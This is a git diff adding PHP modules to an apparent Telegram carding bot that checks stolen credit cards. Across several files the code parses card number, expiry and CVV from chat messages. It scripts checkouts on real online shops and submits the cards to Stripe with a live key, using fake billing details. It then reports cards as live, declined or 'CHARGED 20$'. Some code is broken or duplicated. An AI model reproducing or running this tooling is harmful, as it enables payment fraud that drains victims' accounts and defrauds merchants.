+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+ elseif(strpos($curl2, 'Card Issuer Declined CVV')) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CCN Matched [CVV2 Failure] ✅
+ Response -» Approved (Card Issuer Declined:CVV)
+ Gateway -» Braintree Auth 1
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ else{
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» Dead ❌
+ Response -» $curl2
+ Gateway -» Braintree Auth 2
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ }else{
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Cool! Fucking provide a CC to Check!!",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);
+ }
+ }
+}
+
+
+?>
\ No newline at end of file
diff --git a/modules/checker/ch2.php b/modules/checker/ch2.php
new file mode 100644
index 0000000..1f36a99
--- /dev/null
+++ b/modules/checker/ch2.php
@@ -0,0 +1,467 @@
+$chat_id,
+ 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+ ]);
+ return;
+
+ }else{
+ $messageidtoedit1 = bot('sendmessage',[
+ 'chat_id'=>$chat_id,
+ 'text'=>"Wait for Result...",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+
+ ]);
+
+ $messageidtoedit = capture(json_encode($messageidtoedit1), '"message_id":', ',');
+ $lista = substr($message, 4);
+ $bin = substr($cc, 0, 6);
+
+ if(preg_match_all("/(\d{16})[\/\s:|]*?(\d\d)[\/\s|]*?(\d{2,4})[\/\s|-]*?(\d{3})/", $lista, $matches)) {
+ $creditcard = $matches[0][0];
+ $cc = multiexplode(array(":", "|", "/", " "), $creditcard)[0];
+ $mm = multiexplode(array(":", "|", "/", " "), $creditcard)[1];
+ $yy = multiexplode(array(":", "|", "/", " "), $creditcard)[2];
+ $cvv = multiexplode(array(":", "|", "/", " "), $creditcard)[3];
+
+
+##########################################################CHECKER PART#######################################################
+
+ /////////////////////////////////////////////////////////////////////////////////////
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_HTTPHEADER, array(
+ 'Host: lookup.binlist.net',
+ 'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
+ 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, '');
+ $fim = curl_exec($ch);
+ $bank = capture($fim, '"bank":{"name":"', '"');
+ $cname = capture($fim, '"name":"', '"');
+ $brand = capture($fim, '"brand":"', '"');
+ $country = capture($fim, '"country":{"name":"', '"');
+ $phone = capture($fim, '"phone":"', '"');
+ $scheme = capture($fim, '"scheme":"', '"');
+ $type = capture($fim, '"type":"', '"');
+ $emoji = capture($fim, '"emoji":"', '"');
+ $currency = capture($fim, '"currency":"', '"');
+ $binlenth = strlen($bin);
+ $schemename = ucfirst("$scheme");
+ $typename = ucfirst("$type");
+
+
+ /////////////////////==========[Unavailable if empty]==========////////////////
+
+
+ if (empty($schemename)) {
+ $schemename = "Unavailable";
+ }
+ if (empty($typename)) {
+ $typename = "Unavailable";
+ }
+ if (empty($brand)) {
+ $brand = "Unavailable";
+ }
+ if (empty($bank)) {
+ $bank = "Unavailable";
+ }
+ if (empty($cname)) {
+ $cname = "Unavailable";
+ }
+ if (empty($phone)) {
+ $phone = "Unavailable";
+ }
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////
+ error_reporting(0);
+ ##################################
+ if(!is_dir("lawcookies")){
+ mkdir("lawcookies", 0755);
+ }
+ define("capture", getcwd()."/lawcookies/coo".rand(1100, 9999).".txt");
+
+ #------[Email Generator]------#
+ function emailGenerate($length = 10)
+ {
+ $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
+ $charactersLength = strlen($characters);
+ $randomString = '';
+ for ($i = 0; $i < $length; $i++) {
+ $randomString .= $characters[rand(0, $charactersLength - 1)];
+ }
+ return $randomString . '@gmail.com';
+ }
+ $email = emailGenerate();
+##################################
+
+$curl = curl_init();
+
+$headers = array();
+$headers[] = 'Host: www.24bottles.com';
+$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0';
+$headers[] = 'Accept: */*';
+$headers[] = 'Accept-Language: en-US,en;q=0.5';
+$headers[] = 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8';
+$headers[] = 'X-Requested-With: XMLHttpRequest';
+$headers[] = 'Origin: https://www.24bottles.com';
+$headers[] = 'Connection: keep-alive';
+$headers[] = 'Referer: https://www.24bottles.com/shop/24bottles-x-whatevs-kids-bottle/?attribute_pa_size=250ml';
+$postfield = 'attribute_pa_size=250ml&quantity=1>m4wp_id=160892>m4wp_name=24Bottles+x+Whatevs.+-+Kids+Bottle>m4wp_sku=160892>m4wp_category=New+Arrivals>m4wp_price=19.9>m4wp_stocklevel=&add-to-cart=160892&product_id=160892&variation_id=160893&_wp_http_referer=https://www.24bottles.com/shop/24bottles-x-whatevs-kids-bottle/?attribute_pa_size=250ml';
+
+curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://www.24bottles.com/shop/24bottles-x-whatevs-kids-bottle/?attribute_pa_size=250ml',
+ CURLOPT_POST => 1,
+ CURLOPT_POSTFIELDS => $postfield,
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+]);
+$exe = curl_exec($curl);
+##################################
+$curl = curl_init();
+
+$headers = array();
+$headers[] = 'Host: www.24bottles.com';
+$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0';
+$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8';
+$headers[] = 'Accept-Language: en-US,en;q=0.5';
+$headers[] = 'DNT: 1';
+$headers[] = 'Connection: keep-alive';
+$headers[] = 'Referer: https://www.24bottles.com/shop/24bottles-x-whatevs-kids-bottle/?attribute_pa_size=250ml';
+$headers[] = 'Upgrade-Insecure-Requests: 1';
+
+curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://www.24bottles.com/cart/',
+ CURLOPT_CUSTOMREQUEST => 'GET',
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+]);
+$exe2 = curl_exec($curl);
+##################################
+$curl = curl_init();
+
+$headers = array();
+$headers[] = 'Host: www.24bottles.com';
+$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0';
+$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8';
+$headers[] = 'Accept-Language: en-US,en;q=0.5';
+$headers[] = 'DNT: 1';
+$headers[] = 'Connection: keep-alive';
+$headers[] = 'Referer: https://www.24bottles.com/cart/';
+$headers[] = 'Upgrade-Insecure-Requests: 1';
+
+curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://www.24bottles.com/checkout/',
+ CURLOPT_CUSTOMREQUEST => 'GET',
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+]);
+$exe3 = curl_exec($curl);
+$nonce = t(st(g($exe3, ' 'https://www.24bottles.com/?wc-ajax=update_order_review',
+ CURLOPT_POST => 1,
+ CURLOPT_POSTFIELDS => $postfield,
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+]);
+$exe4 = curl_exec($curl);
+##################################
+$curl = curl_init();
+
+$headers = array();
+$headers[] = 'Host: www.24bottles.com';
+$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0';
+$headers[] = 'Accept: */*';
+$headers[] = 'Accept-Language: en-US,en;q=0.5';
+$headers[] = 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8';
+$headers[] = 'X-Requested-With: XMLHttpRequest';
+$headers[] = 'Origin: https://www.24bottles.com';
+$headers[] = 'DNT: 1';
+$headers[] = 'Connection: keep-alive';
+$headers[] = 'Referer: https://www.24bottles.com/checkout/';
+$postfield = 'security='.$security.'&payment_method=stripe&country=US&state=CA&postcode=95656&city=Hayward&address=26517+Danti+Court&address_2=&s_country=US&s_state=CA&s_postcode=95656&s_city=Hayward&s_address=26517+Danti+Court&s_address_2=&has_full_address=true&post_data=billing_first_name%3DArceus%26billing_last_name%3DOp%26billing_company%3D%26billing_country%3DUS%26billing_address_1%3D26517%2BDanti%2BCourt%26billing_address_2%3D%26billing_city%3DHayward%26billing_state%3DCA%26billing_postcode%3D95656%26billing_phone%3D650-8730750%26billing_email%3Dalterx82%2540gmail.com%26shipping_first_name%3D%26shipping_last_name%3D%26shipping_company%3D%26shipping_country%3DPH%26shipping_address_1%3D%26shipping_address_2%3D%26shipping_city%3D%26shipping_state%3D%26shipping_postcode%3D%26payment_method%3Dstripe%26woocommerce-process-checkout-nonce%3D38e02f330b%26_wp_http_referer%3D%252F%253Fwc-ajax%253Dupdate_order_review%26terms-field%3D1%26woocommerce-process-checkout-nonce%3D'.$nonce.'%26_wp_http_referer%3D%252F%253Fwc-ajax%253Dupdate_order_review';
+
+curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://www.24bottles.com/?wc-ajax=update_order_review',
+ CURLOPT_POST => 1,
+ CURLOPT_POSTFIELDS => $postfield,
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+]);
+$exe5 = curl_exec($curl);
+##################################
+$curl = curl_init();
+
+$headers = array();
+$headers[] = 'Host: api.stripe.com';
+$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0';
+$headers[] = 'Accept: application/json';
+$headers[] = 'Accept-Language: en-US,en;q=0.5';
+$headers[] = 'Content-Type: application/x-www-form-urlencoded';
+$headers[] = 'Origin: https://js.stripe.com';
+$headers[] = 'DNT: 1';
+$headers[] = 'Connection: keep-alive';
+$headers[] = 'Referer: https://js.stripe.com/';
+$postfield = 'type=card&owner[name]=Arceus+Op&owner[address][line1]=26517+Danti+Court&owner[address][state]=CA&owner[address][city]=Hayward&owner[address][postal_code]=95656&owner[address][country]=US&owner[email]=alterx82%40gmail.com&owner[phone]=650-8730750&card[number]='.$cc.'&card[cvc]='.$cvv.'&card[exp_month]='.$mm.'&card[exp_year]='.$yy.'&guid=2d32d4c0-6c4d-4c14-9926-6fe6f71aad341121e6&muid=7bbbb4ef-3d80-4948-8019-4f1dd4511ca0db63e8&sid=932d5d62-1429-4119-ad1f-2f742e5f04a6d12c3e&pasted_fields=number&payment_user_agent=stripe.js%2F56599e29d%3B+stripe-js-v3%2F56599e29d&time_on_page=355882&key=pk_live_eyay50DW6EEJjEyX3Wjlcra0';
+
+curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://api.stripe.com/v1/sources',
+ CURLOPT_POST => 1,
+ CURLOPT_POSTFIELDS => $postfield,
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+]);
+$exe6 = curl_exec($curl);
+$source = t(st(g($exe6, '"id": "','"')));
+##################################
+$curl = curl_init();
+
+$headers = array();
+$headers[] = 'Host: www.24bottles.com';
+$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0';
+$headers[] = 'Accept: application/json, text/javascript, */*; q=0.01';
+$headers[] = 'Accept-Language: en-US,en;q=0.5';
+$headers[] = 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8';
+$headers[] = 'X-Requested-With: XMLHttpRequest';
+$headers[] = 'Origin: https://www.24bottles.com';
+$headers[] = 'DNT: 1';
+$headers[] = 'Connection: keep-alive';
+$headers[] = 'Referer: https://www.24bottles.com/checkout/';
+$postfield = 'billing_first_name=Arceus&billing_last_name=Op&billing_company=&billing_country=US&billing_address_1=26517+Danti+Court&billing_address_2=&billing_city=Hayward&billing_state=CA&billing_postcode=95656&billing_phone=650-8730750&billing_email=alterx82%40gmail.com&shipping_first_name=&shipping_last_name=&shipping_company=&shipping_country=PH&shipping_address_1=&shipping_address_2=&shipping_city=&shipping_state=&shipping_postcode=&payment_method=stripe&shipping_method%5B0%5D=flat_rate%3A2&woocommerce-process-checkout-nonce=38e02f330b&_wp_http_referer=%2F%3Fwc-ajax%3Dupdate_order_review&terms=on&terms-field=1&shipping_method%5B0%5D=flat_rate%3A2&woocommerce-process-checkout-nonce='.$nonce.'&_wp_http_referer=%2F%3Fwc-ajax%3Dupdate_order_review&stripe_source='.$source.'';
+
+curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://www.24bottles.com/?wc-ajax=checkout',
+ CURLOPT_POST => 1,
+ CURLOPT_POSTFIELDS => $postfield,
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+]);
+$exe7 = curl_exec($curl);
+$msg = st(json_decode($exe7, 1)['messages']);
+$url1 = t(st(g($exe7, '"redirect":"','"')));
+$url = stripslashes("$url1");
+$info = curl_getinfo($ch);
+$time = $info['total_time'];
+$time = substr_replace($time, '',4);
+######################END OF CHECKER PART################################################################################
+
+
+ if(strpos($exe7, '#response=')) {
+ addTotal();
+ addUserTotal($userId);
+ addCVV();
+ addUserCVV($userId);
+ addCCN();
+ addUserCCN($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» Dead ❌
+ Response -» EXPIRED CARD OR SOMEOTHER SHIT
+ Gateway -» Stripe 20$ Chrg
+ Time -» $times
+
+ ------- Bin Info -------
+
+------- Bin Info -------
+Bank -» $bank
+Brand -» $schemename
+Type -» $typename
+Currency -» $currency
+Country -» $cname ($emoji - 💲$currency)
+Issuers Contact -» $phone
+----------------------------
+
+Checked By $firstname
+Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ elseif(strpos($exe7, 'The card has insufficient funds to complete the purchase.')) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CVV Matched [Credit Floor] ✅
+ Response -» Approved (Insufficient Funds)
+ Gateway -» Stripe 20$ Chrg
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+ elseif((substr_count($exe7, '"result":"success"') > 0) || (substr_count($exe7, '"redirect":"https"'))){
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CVV Matched [PAYMENT SUCCESS] ✅
+ Response -» Approved (CHARGED 20$)
+ Gateway -» Stripe 20$ Chrg
+ Response -» Proxy ($ip)
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ else{
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» Dead ❌
+ Response -» Card Was Declined
+ Gateway -» Stripe 20$ Chrg
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ }else{
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Cool! Fucking provide a CC to Check!!",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);
+ }
+ }
+}
+
+
+?>
\ No newline at end of file
diff --git a/modules/checker/chg.php b/modules/checker/chg.php
new file mode 100644
index 0000000..88113a9
--- /dev/null
+++ b/modules/checker/chg.php
@@ -0,0 +1,619 @@
+$chat_id,
+ 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+ ]);
+ return;
+
+ }else{
+ $messageidtoedit1 = bot('sendmessage',[
+ 'chat_id'=>$chat_id,
+ 'text'=>"Wait for Result...",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+
+ ]);
+
+ $messageidtoedit = capture(json_encode($messageidtoedit1), '"message_id":', ',');
+ $lista = substr($message, 4);
+ $bin = substr($cc, 0, 6);
+
+ if(preg_match_all("/(\d{16})[\/\s:|]*?(\d\d)[\/\s|]*?(\d{2,4})[\/\s|-]*?(\d{3})/", $lista, $matches)) {
+ $creditcard = $matches[0][0];
+ $cc = multiexplode(array(":", "|", "/", " "), $creditcard)[0];
+ $mm = multiexplode(array(":", "|", "/", " "), $creditcard)[1];
+ $yy = multiexplode(array(":", "|", "/", " "), $creditcard)[2];
+ $cvv = multiexplode(array(":", "|", "/", " "), $creditcard)[3];
+
+
+##########################################################CHECKER PART#######################################################
+
+ /////////////////////////////////////////////////////////////////////////////////////
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_HTTPHEADER, array(
+ 'Host: lookup.binlist.net',
+ 'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
+ 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, '');
+ $fim = curl_exec($ch);
+ $bank = capture($fim, '"bank":{"name":"', '"');
+ $cname = capture($fim, '"name":"', '"');
+ $brand = capture($fim, '"brand":"', '"');
+ $country = capture($fim, '"country":{"name":"', '"');
+ $phone = capture($fim, '"phone":"', '"');
+ $scheme = capture($fim, '"scheme":"', '"');
+ $type = capture($fim, '"type":"', '"');
+ $emoji = capture($fim, '"emoji":"', '"');
+ $currency = capture($fim, '"currency":"', '"');
+ $binlenth = strlen($bin);
+ $schemename = ucfirst("$scheme");
+ $typename = ucfirst("$type");
+
+
+ /////////////////////==========[Unavailable if empty]==========////////////////
+
+
+ if (empty($schemename)) {
+ $schemename = "Unavailable";
+ }
+ if (empty($typename)) {
+ $typename = "Unavailable";
+ }
+ if (empty($brand)) {
+ $brand = "Unavailable";
+ }
+ if (empty($bank)) {
+ $bank = "Unavailable";
+ }
+ if (empty($cname)) {
+ $cname = "Unavailable";
+ }
+ if (empty($phone)) {
+ $phone = "Unavailable";
+ }
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////
+ error_reporting(0);
+ ##################################
+ if(!is_dir("lawcookies")){
+ mkdir("lawcookies", 0755);
+ }
+ define("capture", getcwd()."/lawcookies/coo".rand(1100, 9999).".txt");
+
+ #------[Email Generator]------#
+ function emailGenerate($length = 10)
+ {
+ $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
+ $charactersLength = strlen($characters);
+ $randomString = '';
+ for ($i = 0; $i < $length; $i++) {
+ $randomString .= $characters[rand(0, $charactersLength - 1)];
+ }
+ return $randomString . '@gmail.com';
+ }
+ $email = emailGenerate();
+ ##################################
+ $curl = curl_init();
+ curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://random-data-api.com/api/users/random_user',
+ CURLOPT_CUSTOMREQUEST => 'GET',
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ ]);
+ $exe = curl_exec($curl);
+ $fname = json_decode($exe, true)['first_name'];
+ $lname = json_decode($exe, true)['last_name'];
+ $address = json_decode($exe, true)['address']['street_address'];
+ $city = json_decode($exe, true)['address']['city'];
+ $location_state = json_decode($exe, true)['address']['state'];
+ $postcode = json_decode($exe, true)['address']['zip_code'];
+ if(strpos($postcode, '-')){
+ $postcode = explode("-", $postcode);
+ $postcode = $postcode[0];
+ }
+ $phone = ''.rand(111, 999).'-'.rand(1111111, 9999999).'';
+ if ($location_state == "Alabama") {
+ $state = "AL";
+ } else if ($location_state == "Alaska") {
+ $state = "AK";
+ } else if ($location_state == "Arizona") {
+ $state = "AR";
+ } else if ($location_state == "California") {
+ $state = "CA";
+ } else if ($location_state == "Colorado") {
+ $state = "CO";
+ } else if ($location_state == "Connecticut") {
+ $state = "CT";
+ } else if ($location_state == "Delaware") {
+ $state = "DE";
+ } else if ($location_state == "District of columbia") {
+ $state = "DC";
+ } else if ($location_state == "Florida") {
+ $state = "FL";
+ } else if ($location_state == "Georgia") {
+ $state = "GA";
+ } else if ($location_state == "Hawaii") {
+ $state = "HI";
+ } else if ($location_state == "Idaho") {
+ $state = "ID";
+ } else if ($location_state == "Illinois") {
+ $state = "IL";
+ } else if ($location_state == "Indiana") {
+ $state = "IN";
+ } else if ($location_state == "Iowa") {
+ $state = "IA";
+ } else if ($location_state == "Kansas") {
+ $state = "KS";
+ } else if ($location_state == "Kentucky") {
+ $state = "KY";
+ } else if ($location_state == "Louisiana") {
+ $state = "LA";
+ } else if ($location_state == "Maine") {
+ $state = "ME";
+ } else if ($location_state == "Maryland") {
+ $state = "MD";
+ } else if ($location_state == "Massachusetts") {
+ $state = "MA";
+ } else if ($location_state == "Michigan") {
+ $state = "MI";
+ } else if ($location_state == "Minnesota") {
+ $state = "MN";
+ } else if ($location_state == "Mississippi") {
+ $state = "MS";
+ } else if ($location_state == "Missouri") {
+ $state = "MO";
+ } else if ($location_state == "Montana") {
+ $state = "MT";
+ } else if ($location_state == "Nebraska") {
+ $state = "NE";
+ } else if ($location_state == "Nevada") {
+ $state = "NV";
+ } else if ($location_state == "Wyoming") {
+ $state = "WY";
+ } else {
+ $state = "KY";
+ }
+
+
+ ////////////////////////////////////////////
+
+ $curl = curl_init();
+ $headers = array();
+ $headers[] = 'authority: www.animalcontrolproducts.com';
+ $headers[] = 'method: GET';
+ $headers[] = 'path: /product/victor-mouse-glue-trap/';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: document';
+ $headers[] = 'sec-fetch-mode: navigate';
+ $headers[] = 'sec-fetch-site: none';
+ $headers[] = 'sec-fetch-user: ?1';
+ $headers[] = 'upgrade-insecure-requests: 1';
+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+
+ curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://www.animalcontrolproducts.com/product/victor-mouse-glue-trap/',
+ CURLOPT_CUSTOMREQUEST => 'GET',
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+ ]);
+ $exe = curl_exec($curl);
+
+ ################################
+
+
+ $curl = curl_init();
+ $headers = array();
+ $headers[] = 'authority: www.animalcontrolproducts.com';
+ $headers[] = 'method: POST';
+ $headers[] = 'path: /product/victor-mouse-glue-trap/';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'cache-control: max-age=0';
+ $headers[] = 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryrwOwOa9IfBc5AZZl';
+ $headers[] = 'origin: https://www.animalcontrolproducts.com';
+ $headers[] = 'referer: https://www.animalcontrolproducts.com/product/victor-mouse-glue-trap/';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: document';
+ $headers[] = 'sec-fetch-mode: navigate';
+ $headers[] = 'sec-fetch-site: same-origin';
+ $headers[] = 'sec-fetch-user: ?1';
+ $headers[] = 'upgrade-insecure-requests: 1';
